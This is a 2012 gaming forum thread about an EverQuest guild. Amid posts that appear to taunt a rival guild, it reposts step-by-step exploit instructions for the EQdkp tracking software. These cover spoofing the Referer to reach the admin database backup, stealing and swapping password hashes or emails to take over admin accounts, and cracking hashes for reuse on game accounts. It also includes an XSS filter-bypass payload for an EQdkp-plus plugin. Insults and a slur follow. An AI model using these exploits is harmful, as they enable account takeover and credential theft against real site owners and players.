|
|
#1
06-26-2012, 03:47 PM
|
|||
|
We wiped to Cazic for 6 hours on Saturday
Werent able to kill him, only had 22 players that logged on
And then we spent 5 hours in Air last night Who'se jelous? http://dkp.swiftglobal.com/viewraid.php?r=234 | ||
|
|
|||
|
#3
06-26-2012, 08:02 PM
|
|||||
|
Title: EQdkp <= 1.3.1 Referer Spoof to access to SQL Database
URL: http://www.eqdkp.com Hook: "Powered by EQdkp" Author: Eight10 Contact: Eight10@gmail.com -------------------------------------------------------------------------------------------------------- Background: EQdkp is the largest DKP tracking program utilized largely by the MMORPG community, specifically large use in the World of Warcraft Community among Guild/clan Websites. -------------------------------------------------------------------------------------------------------- Discussion: A Vulnerability exists in all current versions of EQdkp that allows one to spoof Their refering URL to gain access to an integrated class-1 MySQL Backup/Restore program which allows one to download and modify sensitive SQL data. The script only checks for authentication via refering url from the administration control panel. Note some sites have this funcitonality disabled/not installed. From the EQdkp_USERS.sql file, the username/email and MD5 Hashed password can be obtained. From there the password needs to be cracked. Tested on: 1.3.1 Default install. 1.3.0 Default install. --------------------------------------------------------------------------------------------------------- Exploit: Use a referer spoofing program, like quickspoof. Refering URL - - http://www.sitehere.com/pathtoeqdkp/admin/ Target URL - - http://www.sitehere.com/pathtoeqdkp/admin/backup From the Control menu goto "Backup MySQL data" and select the appropraite Database*. Download eqdkp_users.sql from there and MD5 Hashes and usernames/emails will be present. E.g. VALUES ('1', 'admin', 'ec67739608318602f2dd6bcb141b56bc', 'admin@guildswebsite.com', ...... --------------------------------------------------------------------------------------------------------- Alternative type attack**: One downloads the EQDKP_users.sql and modifies the administration hash in there to be "5f4dcc3b5aa765d61d8327deb882cf99" == password One could then restore said Database and login to the EQdkp system as admin. Alternate type attack 2**: One Downloads the EQDKP_users.sql and modifies the email address to his own. Then one requests a password reset from the "forgot my password" page. Then the reset password is emailed to the new email address. ---------------------------------------------------------------------------------------------------------- Futher Discussion: As we know people tend to use the same passwords in multiple places, especially when the topics are related, for instance WoW account information and WoW clan websites. Along with similiar passes often used for the email address, which one can retrieve account names from the blizzards site. Note, when cracking, the requirements for WoW passwords, I believe it is atleast 8 characters long containing both numbers and letters. These can be difficult hashes to break but when the passwords are weak dictionary words simply followed by numbers, a good amount of success can be achieved. This method is especially good when you already have appropriately generated rainbow tables, or hashes can be sent to online hash crackers. *Note Other databases can be obtained using this SQL backup tool too! Such as PHPBB databases. **(Note Sometimes Permission settings prevent SQL restores) Shout Out: RichyPoo (Calrich AKA Faglord). Throhg (pwnt). BrowerPower. Bliznat(ty) _______ _________ _______ _________ __ _______ ( ____ \\__ __/( ____ \|\ /|\__ __// \ ( __ ) | ( \/ ) ( | ( \/| ) ( | ) ( \/) ) | ( ) | | (__ | | | | | (___) | | | | | | | / | | __) | | | | ____ | ___ | | | | | | (/ /) | | ( | | | | \_ )| ( ) | | | | | | / | | | (____/\___) (___| (___) || ) ( | | | __) (_| (__) | (_______/\_______/(_______)|/ \| )_( \____/(_______)
__________________
 Quote:
Quote:
| ||||
|
|
|||||
|
#4
06-26-2012, 08:02 PM
|
|||||
|
[code=plugins/mediacenter/include/mediacenter.class.php:421]
function check_content($fieldname){ $disallowed = "body|head|html|img|plaintext|a href|pre|script|table|title|php"; $disallowed_content = explode('|', $disallowed); if (empty($disallowed_content)) { return false; } [/code] To get around this, you can use the Next design: Code:
<iframe src="http://yandex.ru" style="display: none" onload="alert('XSS')">
</iframe>
http://site.com/dkp/plugins/mediacen...p?mode=ajax&id = [ID]. [ID] - simple exhaustive search. Example: http://www.eqdkp-plus.com/demo06/dat...a3825c2494f2/m ediacenter/thumbs_b/ee5bb2c59c237307d61bcb0bae1e08f2.htm Vulnerable versions: <=0.6.4.5
__________________
Quote:
Quote:
| ||||
|
|
|||||
|
#5
06-26-2012, 08:03 PM
|
|||||
|
__________________
Quote:
Quote:
| ||||
|
|
|||||
|
#7
06-27-2012, 12:53 AM
|
|||
|
Who is pathetic enough to obsess over a guild on a server that they no longer play on to the degree of "sleazing" into their vent, DKP, forums, etc.?
You need a life far more than the people enjoying their hobby in a videogame that you got owned on and laughed off of, Salty.(even if they are cheating pieces of shit who should be banned like you are) | ||
|
|
|||
|
#8
06-27-2012, 10:10 AM
|
||||
|
Quote:
so true, this is the part that i never got. If I was done playing on the server, i'd sure as hell not lurk around obsessing on it all day. This just shows how bitter and mad they are, they could not beat Nihilum in game, so they try to poison the atmosphere on the fourums for.... what? In hopes of a wipe? lol, never gonna happen. This is project99, not some fly by night shitbox that can wink out in a heartbeat. See you in Kunark and Velious. | |||
|
|
||||
 |
|
|
Linear Mode
